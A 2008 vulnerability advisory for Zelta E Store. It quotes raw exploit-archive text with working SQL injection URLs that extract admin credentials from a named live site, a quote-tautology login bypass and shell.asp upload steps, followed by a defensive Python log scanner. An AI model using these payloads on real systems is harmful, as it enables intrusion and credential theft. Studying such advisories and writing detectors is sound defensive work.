Vendor: Zelta E Store
Discovered by: ZoRLu
CVSS: 8.8 (HIGH)
Type: Remote File Upload / Bypass / R-SQL / B-SQL
CWE: 89 (SQL Injection, listed four times)
Product Name: Zelta E Store
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns

Zelta E Store is prone to multiple remote vulnerabilities: remote file upload, authentication bypass, R-SQL (union-based) injection and B-SQL (blind, boolean-based) injection. An attacker can exploit these issues to upload arbitrary files to the affected server, bypass authentication, execute arbitrary SQL commands, and gain access to sensitive information such as administrator credentials. This may lead to further attacks.

Mitigation:

Users should apply the latest patches and updates provided by the vendor. Additionally, the application should validate and sanitize all user-supplied input (query parameters, login fields and uploaded file names and types) before it reaches the database or the file system, so that malicious input cannot enter the system.

Exploit-DB raw data:

[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns. 
[~]
[~] script: http://www.zeltatrade.com/
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Date: 16/12/2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo 
[~]
[~] NOTE: Loneliness lost its meaning in my solitude :( (
[~] -----------------------------------------------------------

exp for demo: (R-SQL)

user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin

pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin


exp for demo: (B-SQL)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)


exp for demo: (auth bypass)

http://joineazy.com/members/login.asp

username: trt-turk@hotmail.com

pass: ' or '


exp for demo: (admin bypass)

http://joineazy.com/embadmin/admin_main.asp

http://joineazy.com/embadmin/site_setup.asp

http://joineazy.com/embadmin/main_baseimage.asp


exp for demo: (RFU)

First, register on the site.

Log in, edit your pictures, and select your shell.asp as the picture to upload.

Then browse to your shell.asp:

http://joineazy.com/members/member_pictures/shell.asp

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-12-16]
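The advisory's mitigation advice and its demo requests suggest two defender-side checks, shown below as an added example that is not part of the advisory or of Zelta E Store: the digits-only allowlist a patched productsofcat.asp should apply to category_id, and a scanner that flags the request patterns demonstrated above (UNION SELECT in category_id, a boolean probe, a quote tautology) plus server-side scripts served from the member picture directory. The simplified W3C-style log format, the sample lines and the blocked extension list are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in a simplified W3C shape (date time method uri-stem uri-query status).
# They are not taken from the advisory; the query strings mirror the patterns it describes.
SAMPLE_LOG = """\
2008-12-16 10:01:02 GET /store/productsofcat.asp p=1&category_id=17 200
2008-12-16 10:01:09 GET /store/productsofcat.asp p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin 200
2008-12-16 10:01:15 GET /store/productsofcat.asp p=1&category_id=17+and+1=100 200
2008-12-16 10:02:30 GET /members/member_pictures/shell.asp - 200
2008-12-16 10:03:00 GET /members/member_pictures/avatar.jpg - 200
"""

INDICATORS = {
    "union-select": re.compile(r"\bunion\b.+\bselect\b", re.I | re.S),
    "boolean-probe": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "quote-tautology": re.compile(r"'\s*or\s*'", re.I),
}
# Assumed list of server-side script extensions that must never be served from the upload directory.
EXECUTABLE_UPLOAD = re.compile(r"^/members/member_pictures/.+\.(?:asp|aspx|asa|cer)$", re.I)

def is_valid_category_id(value: str) -> bool:
    """Allowlist check a patched productsofcat.asp should apply before building SQL: digits only."""
    return value.isdigit() and 0 < int(value) < 10**9

def classify_param(raw_value: str) -> list[str]:
    """Return the injection indicators found in one URL-encoded query parameter value."""
    decoded = unquote_plus(raw_value)
    return [tag for tag, pattern in INDICATORS.items() if pattern.search(decoded)]

def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (time, uri-stem, indicators) for every log line that should raise an alert."""
    findings = []
    for line in text.splitlines():
        _date, time, _method, stem, query, _status = line.split(" ", 5)
        tags = []
        for pair in (query.split("&") if query != "-" else []):
            name, _, raw_value = pair.partition("=")
            tags += [f"{name}:{t}" for t in classify_param(raw_value)]
            # The id must be numeric; flag anything else even when no known pattern matched.
            if name == "category_id" and not is_valid_category_id(unquote_plus(raw_value)):
                tags.append("category_id:non-numeric")
        if EXECUTABLE_UPLOAD.match(stem):
            tags.append("path:script-in-upload-dir")
        if tags:
            findings.append((time, stem, tags))
    return findings
```

Running scan_log(SAMPLE_LOG) flags the union, boolean-probe and shell.asp lines and leaves the two legitimate requests alone.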